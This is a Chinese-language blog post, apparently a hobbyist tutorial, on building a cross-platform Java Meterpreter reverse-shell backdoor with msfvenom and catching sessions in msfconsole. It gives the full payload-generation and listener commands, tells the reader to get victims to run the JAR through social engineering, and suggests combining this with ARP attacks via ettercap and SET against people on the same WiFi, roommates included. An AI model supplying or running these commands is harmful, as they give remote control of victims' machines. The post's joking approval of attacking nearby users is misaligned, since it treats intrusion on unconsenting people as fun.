metasploit不愧為一大自動化滲透神器。各個平台的滲透輕鬆應對,現在除了 iphone 我還不會,其他的大多數平台我已經來去自如了。利用 java 的跨平台特性同一個 payload 可以直接拿下大量 shell

Its show time!

首先打開 Kali Linux

msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=192.168.1.107 LPORT=4444 -t jar > jar_test.jar

# 使用的payload 是 java/meterpreter/reverse_tcp
# 生成的jar包直接用 java -jar XXXX.jar 來運行

將生成的後門投遞到對方電腦了上,讓對方運行,這就要用到社工手段了。

打開 msfconsole

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 4444
exploit -j -z
# 然後就等著魚兒上鉤吧 ^_^
# 使用 sessions -i 來查看上鉤的魚兒

首先演示 Windows 8.1 上鉤效果

運行

上鉤

接著是 linux

我就用 kali linux 本身來測試了

運行

上鉤

然後是我日思夜想要幹掉的 Mac OS X(以10.10為例)

哇咔咔!!三大平台已經幹掉了,就剩移動端了,

一般來說 Mac 電腦上會裝上 java 的,所以這個 payload 成功率很大,而 linux 自帶 java,有些電腦小白不會在 windows 中安裝 java,少數那也不怕,我的以後的文章會寫可以直接攻擊 windows的,專門攻擊 windows 的 payload 還是相當多的,免殺也可以做起來。

iphone我目前還沒有著手測試。。。為啥。。。因為窮啊啊啊啊!!!!虛擬機搭建一個Mac以及卡爆了,要是再在Mac里來一個iphone那就別玩了。。。安卓端控制起來也是相當容易,不過要等下一次再寫了。

總結:如果你不是用的iphone,請不要跟我共用一個wifi,尤其不要跟我搶wifi。謝謝。

PS:上述技術結合arp攻擊,尤其是用ettercap和setookit結合起來,在區域網你就是無敵的。

PPS:有了ettercap+setookit就算你是iphone也照樣別跟我搶WiFi。。

善意的微笑獻給一直致力於跟我搶wifi的室友們。


推薦閱讀:
相关文章